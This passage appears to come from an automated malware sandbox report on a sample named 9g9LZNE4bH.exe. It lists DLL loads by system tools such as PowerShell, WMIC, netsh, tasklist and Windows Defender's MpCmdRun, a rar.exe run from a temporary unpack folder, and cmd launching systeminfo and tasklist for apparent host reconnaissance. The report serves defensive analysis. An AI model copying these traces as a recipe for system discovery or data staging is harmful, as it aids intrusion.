              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: 9g9LZNE4bH.exeStatic PE information: Image base 0x140000000 > 0x60000000
